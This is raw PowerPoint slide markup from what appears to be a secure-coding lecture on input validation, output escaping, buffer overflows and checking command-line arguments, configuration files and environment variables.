            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Default-deny </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>rule</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>allow only “good” characters and formulas and reject others </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(instead of looking for “bad” ones)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use regular expressions </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bounds checking, length checking (buffer overflow) etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Validation at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different levels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>at input data entry point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>right before taking security decisions based on that data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Validation and sanitization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50825" y="1125538"/>
          <a:ext cx="5041255" cy="51831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ounded Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940425" y="2133600"/>
            <a:ext cx="2952750" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -145061"/>
              <a:gd name="adj2" fmla="val 29517"/>
              <a:gd name="adj3" fmla="val 1666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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validate your input here</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(check if it is correct)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940425" y="4076700"/>
            <a:ext cx="2952750" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -145061"/>
              <a:gd name="adj2" fmla="val 29517"/>
              <a:gd name="adj3" fmla="val 1666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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitize your output here (escape special characters etc.)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Sanitizing output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="655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mtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Escaping characters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>that may cause problems in external systems (filesystem, database, LDAP, Mail server, the Web, client browser etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" smtClean="0"/>
              <a:t> =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Reuse existing functions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>E.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0"/>
              <a:t>addslashes() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>in PHP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Enemy #1: Input data (cont.)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31800" indent="-323850" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(overrun)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>accepting input longer than the size of allocated memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>risk: from crashing system to executing attacker’s code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(stack-smashing attack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>example: the Internet worm by Robert T. Morris (1988)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>comes from C, still an issue (C used in system libraries)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>allocate enough memory for each string (incl. null byte)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>use safe functions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets()	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2100" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fget()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2100" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strlcpy()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>(same for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcat()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="-287338" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>tools to detect: Immunix StackGuard, IBM ProPolice etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66564" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1208088" y="5026025"/>
            <a:ext cx="1276350" cy="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6565" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1220788" y="4699000"/>
            <a:ext cx="903287" cy="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Enemy #1: Input data (cont.)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31800" indent="-323850" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="431800" indent="-323850" defTabSz="457200" eaLnBrk="1" hangingPunct="1">
              <a:tabLst>
                <a:tab pos="2151063" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67588" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1208088" y="5026025"/>
            <a:ext cx="1276350" cy="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7589" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1220788" y="4699000"/>
            <a:ext cx="903287" cy="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7590" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755650" y="2809875"/>
            <a:ext cx="7740650" cy="2419350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45" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67591" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2898775" y="3119438"/>
            <a:ext cx="942975" cy="417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45" tIns="41473" rIns="82945" bIns="41473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2200"/>
              <a:t>Input: </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="67592" name="Group 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="962025" y="4260850"/>
            <a:ext cx="7258050" cy="484188"/>
            <a:chOff x="775" y="3052"/>
            <a:chExt cx="5040" cy="337"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67601" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2215" y="3053"/>
              <a:ext cx="624" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/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602" name="Rectangle 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3895" y="3053"/>
              <a:ext cx="1392" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/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603" name="AutoShape 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5287" y="3053"/>
              <a:ext cx="528" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50000"/>
                <a:gd name="adj3" fmla="val 60420"/>
                <a:gd name="adj4" fmla="val 32199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604" name="AutoShape 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000">
              <a:off x="1687" y="3053"/>
              <a:ext cx="528" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 50000"/>
                <a:gd name="adj3" fmla="val 60420"/>
                <a:gd name="adj4" fmla="val 32199"/>
              </a:avLst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605" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="775" y="3052"/>
              <a:ext cx="925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82945" tIns="41473" rIns="82945" bIns="41473">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr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sz="2200"/>
                <a:t>Memory: </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67606" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2839" y="3053"/>
              <a:ext cx="1056" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="99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7593" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3009900" y="4262438"/>
            <a:ext cx="838200" cy="417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45" tIns="41473" rIns="82945" bIns="41473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2200">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67594" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3935413" y="4262438"/>
            <a:ext cx="1520825" cy="482600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF"/>
          </a:solidFill>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67595" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3935413" y="4262438"/>
            <a:ext cx="1520825" cy="482600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82945" tIns="41473" rIns="82945" bIns="41473" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67596" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3935413" y="3144838"/>
            <a:ext cx="2520950" cy="417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45" tIns="41473" rIns="82945" bIns="41473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2200">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>too long input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67597" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3935413" y="4262438"/>
            <a:ext cx="3432175" cy="417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945" tIns="41473" rIns="82945" bIns="41473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2200">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>too long</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>67890</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67598" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3935413" y="3144838"/>
            <a:ext cx="2520950" cy="417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45" tIns="41473" rIns="82945" bIns="41473">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="82867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82867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867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867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867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sz="2200">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>too long input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67599" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4764088" y="3570288"/>
            <a:ext cx="276225" cy="552450"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49019"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst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67600" name="Picture 22" descr="pirat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0988" y="2879725"/>
            <a:ext cx="885825" cy="1147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What is (computer) security?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i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>Security is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>enforcing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t> a policy that describes rules for accessing resources*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>resource is data, devices, the system itself (i.e. its availability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Security is a system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>property</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, not a feature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Security is part of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reliability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" i="1" smtClean="0"/>
              <a:t>Building Secure Software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" smtClean="0"/>
              <a:t>J. Viega, G. McGraw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Enemy #1: Input data (cont.)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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command-line arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>are numbers within range?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>does the path/file exist? (or is it a path or a link?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>does the user exist?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>are there extra arguments?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Configuration files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>– if accessible by untrusted users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>check correctness of the environmental variables</a:t>
            </a:r>
          </a:p>
          <a:p>
